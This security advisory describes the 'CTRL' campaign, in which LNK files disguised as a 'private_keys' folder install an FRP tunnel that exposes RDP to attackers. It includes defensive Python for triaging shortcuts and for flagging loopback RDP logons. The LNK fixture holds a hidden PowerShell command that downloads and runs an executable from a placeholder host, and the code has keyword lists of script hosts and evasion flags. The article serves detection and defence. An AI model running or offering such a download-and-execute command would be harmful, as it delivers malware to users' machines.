Russian CTRL Toolkit Hijacks RDP via Malicious LNK
What Happened
Cybersecurity researchers have identified an active campaign distributing a remote access toolkit of suspected Russian origin, dubbed "CTRL." The malware is delivered through malicious Windows Shortcut (LNK) files disguised as folders that supposedly contain private keys. In a separate development, Microsoft has pulled a non-security preview update for Windows 11 (KB5079391) because of installation errors. The two events are not linked: the CTRL campaign needs no Windows vulnerability, so the status of KB5079391 has no bearing on an organisation's exposure to it, although it does add to the patch-tracking load on administrators in the same week.
Why It Matters
This campaign matters because it pairs a low-tech initial vector, a malicious LNK file, with a capable backdoor. The toolkit's primary function is to give the attacker Remote Desktop Protocol (RDP) access to the compromised host: it tunnels the local RDP port out through FRP (Fast Reverse Proxy) to a command-and-control server, so the attacker reaches the desktop without any inbound connection to the victim network. This gives persistent, hard-to-spot access and creates a significant data-theft and intrusion risk. The incident underscores that social engineering and file-based attacks remain potent without any new software vulnerability.
Technical Details
The attack chain begins with a spear-phishing email or another delivery method carrying a ZIP archive. Inside is an LNK file dressed up as a directory (for example "private_keys"), typically with a folder icon so that a victim double-clicks it expecting to browse its contents. Opening the shortcut instead runs a PowerShell command line that downloads and executes the CTRL payload. Once installed, the toolkit establishes persistence and starts the open-source FRP client, which makes an outbound connection to an attacker-run FRP server and exposes the host's local RDP port (typically 3389) on that server. The attacker then connects to the server with an ordinary RDP client and lands on the victim's desktop. Because the only traffic the victim network sees is an outbound connection from the host to the FRP server, inbound firewall rules on 3389 and perimeter RDP monitoring never come into play.
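The folder-disguised shortcut described above can be triaged without running it, because every tell (a script host as the target, download and hidden-window switches in the arguments, a folder icon borrowed from shell32.dll, a minimised start window) sits in the Shell Link header and StringData section. The following parser and triage routine is an added example written for this page; it is not CTRL tooling or any vendor's code. The sample LNK blobs are constructed in the script itself (the `build_lnk` helper only exists to make the example self-contained), the `example.invalid` URL is a placeholder, and the "folder icon" check assumes the closed/open folder icons are shell32.dll indexes 3 and 4.

```python
"""Triage Windows .lnk files for the folder-disguised PowerShell downloader pattern."""
import struct

LINK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7            # ShowCommand value attackers use to keep the console out of sight
FILE_ATTRIBUTE_DIRECTORY = 0x10
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
DOWNLOAD_HINTS = ("http", "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                  "-enc", "bypass", "hidden")


def _string_data(data, pos, unicode):
    """Read one StringData field: UINT16 character count followed by the text."""
    (count,) = struct.unpack_from("<H", data, pos)
    pos += 2
    if unicode:
        text = data[pos:pos + 2 * count].decode("utf-16-le")
        pos += 2 * count
    else:
        text = data[pos:pos + count].decode("cp1252", errors="replace")
        pos += count
    return text, pos


def parse_lnk(data):
    """Minimal MS-SHLLINK parser: header fields plus the StringData section."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, attrs = struct.unpack_from("<II", data, 20)
    icon_index, show_cmd = struct.unpack_from("<iI", data, 56)
    pos = 76
    if flags & HAS_ID_LIST:        # LinkTargetIDList: UINT16 size, then the item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:      # LinkInfo: UINT32 size that includes the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "attrs": attrs, "icon_index": icon_index, "show_cmd": show_cmd}
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon_location")):
        if flags & bit:
            info[key], pos = _string_data(data, pos, bool(flags & IS_UNICODE))
        else:
            info[key] = ""
    return info


def triage(data):
    """Return the indicators that match the campaign pattern (empty list = nothing suspicious)."""
    info = parse_lnk(data)
    target = (info["relative_path"] + " " + info["arguments"]).lower()
    findings = []
    if any(h in target for h in SCRIPT_HOSTS):
        findings.append("target is a script host")
    if any(h in target for h in DOWNLOAD_HINTS):
        findings.append("arguments contain download/evasion keywords")
    # Assumption: closed/open folder icons are shell32.dll indexes 3 and 4.
    if "shell32.dll" in info["icon_location"].lower() and info["icon_index"] in (3, 4):
        findings.append("shortcut wears a folder icon")
    if info["attrs"] & FILE_ATTRIBUTE_DIRECTORY:
        findings.append("FILE_ATTRIBUTE_DIRECTORY set on a shortcut")
    if info["show_cmd"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimised (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(relative_path, arguments="", icon_location="", icon_index=0, show_cmd=1, attrs=0x20):
    """Constructed sample generator so the example runs offline; a test fixture, not attacker tooling."""
    flags = IS_UNICODE | HAS_REL_PATH | (HAS_ARGS if arguments else 0) | (HAS_ICON if icon_location else 0)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags, attrs,
                         0, 0, 0, 0, icon_index, show_cmd, 0, 0, 0, 0)
    body = b""
    for text in (relative_path, arguments, icon_location):   # StringData order with name/workdir omitted
        if text:
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples: a "private_keys" decoy in the shape the article describes, and a benign document link.
MALICIOUS = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"-w hidden -nop -ep bypass -c iwr http://example.invalid/ctrl -OutFile $env:TEMP\c.exe; & $env:TEMP\c.exe",
    r"%SystemRoot%\System32\shell32.dll", icon_index=3, show_cmd=SW_SHOWMINNOACTIVE)
BENIGN = build_lnk(r"..\Documents\report.docx")

if __name__ == "__main__":
    for label, blob in (("private_keys.lnk", MALICIOUS), ("report.lnk", BENIGN)):
        print(label, "->", triage(blob) or ["clean"])
```

Run `triage(open(path, "rb").read())` over every `.lnk` extracted from a quarantined ZIP; any hit on the script-host or folder-icon rules deserves a look, and two or more together match this campaign's decoy closely. The parser deliberately skips the LinkTargetIDList and LinkInfo blocks rather than decoding them, because the fields that matter for this decoy are in StringData.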
Immediate Risk
The immediate risk is MEDIUM. The attack exploits no zero-day or specific CVE; it relies entirely on a user opening the shortcut. Its success rate can nevertheless be high where attachment filtering does not strip LNK files or nested archives, where PowerShell execution is unrestricted, or where users have not been trained on this lure. Office macro controls offer no protection here, because no macro is involved. Organisations with remote workers who depend on RDP are particularly exposed to credential theft and lateral movement once an attacker holds a desktop session. The threat is active in the wild and calls for proactive hardening and detection rather than the emergency patching that a critical bug such as CVE-2026-32194 demands.
Security Insight
Security teams should prioritise defence in depth. Technical controls should include blocking LNK files in email attachments and archives where possible, enforcing application allow-listing so that a shortcut cannot launch an unauthorised PowerShell command line, and monitoring outbound connections for FRP client traffic to unknown destinations. User training should cover this specific lure: a "folder" that is actually a .lnk file. Restrict RDP to VPN or bastion paths and alert on every interactive RDP logon that does not arrive through them; note that a session reaching the host through a local FRP tunnel appears to come from loopback rather than from an external address, so loopback-sourced RDP logons are a red flag in their own right. Regularly review and test patch management so that genuine fixes are not delayed, keeping in mind that other critical vulnerabilities, such as CVE-2026-31957, also demand timely attention.
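Alerting on "RDP from an unexpected external IP" misses the tunnel described in this article: the FRP client connects to 127.0.0.1:3389 on the victim, so the Security event log records the attacker's session as an interactive RDP logon (Event ID 4624, LogonType 10) from loopback. The detection below is an added example for this page, not code from the researchers or from any product; it runs over constructed 4624 records (field names follow the Windows Security log, but the values are invented) and treats the `APPROVED_SOURCES` bastion and VPN ranges as an assumption to be replaced with your own.

```python
"""Flag interactive RDP logons (4624 / LogonType 10) that do not come through the sanctioned path."""
import ipaddress

# Assumption: legitimate RDP only arrives from these bastion and VPN ranges.
APPROVED_SOURCES = [ipaddress.ip_network("10.50.0.0/24"), ipaddress.ip_network("10.60.1.0/24")]


def _parse_ip(text):
    """Parse the IpAddress field; unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) as the log often records it."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return None
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return ip


def classify(event):
    """Return None for an expected logon, otherwise a short reason for alerting."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 10:
        return None                       # only interactive RDP logons are in scope
    ip = _parse_ip(event.get("IpAddress", "-"))
    if ip is None:
        return "interactive RDP logon with no usable source address"
    if ip.is_loopback:
        # A local proxy such as frpc fronting 3389 hands RDP to the host from 127.0.0.1.
        return "RDP logon from loopback: consistent with a local tunnel fronting port 3389"
    if not any(ip in net for net in APPROVED_SOURCES):
        return "RDP logon from unsanctioned source %s" % ip
    return None


def hunt(events):
    """Return (time, account, reason) for every record that classify() flags."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason:
            hits.append((event["TimeCreated"], event["TargetUserName"], reason))
    return hits


# Constructed sample records in Security-log field names (values are invented for the example).
EVENTS = [
    {"TimeCreated": "2026-03-12T08:01:10Z", "EventID": 4624, "LogonType": 10,
     "TargetUserName": "jdoe", "IpAddress": "10.50.0.12"},              # via bastion: expected
    {"TimeCreated": "2026-03-12T08:14:52Z", "EventID": 4624, "LogonType": 10,
     "TargetUserName": "jdoe", "IpAddress": "127.0.0.1"},               # through a local tunnel
    {"TimeCreated": "2026-03-12T09:30:05Z", "EventID": 4624, "LogonType": 10,
     "TargetUserName": "svc_backup", "IpAddress": "203.0.113.45"},      # direct from the Internet
    {"TimeCreated": "2026-03-12T09:31:00Z", "EventID": 4624, "LogonType": 3,
     "TargetUserName": "svc_backup", "IpAddress": "127.0.0.1"},         # network logon, not RDP
    {"TimeCreated": "2026-03-12T10:02:41Z", "EventID": 4624, "LogonType": 10,
     "TargetUserName": "asmith", "IpAddress": "::ffff:10.60.1.7"},      # VPN range, IPv4-mapped form
]

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(*hit, sep=" | ")
```

Feed it records exported from the Security channel (for example the XML or JSON from `Get-WinEvent`) after mapping the fields, and pair the loopback rule with a process-level check for whatever is listening or proxying on the host, since the log alone cannot name the tunnel binary.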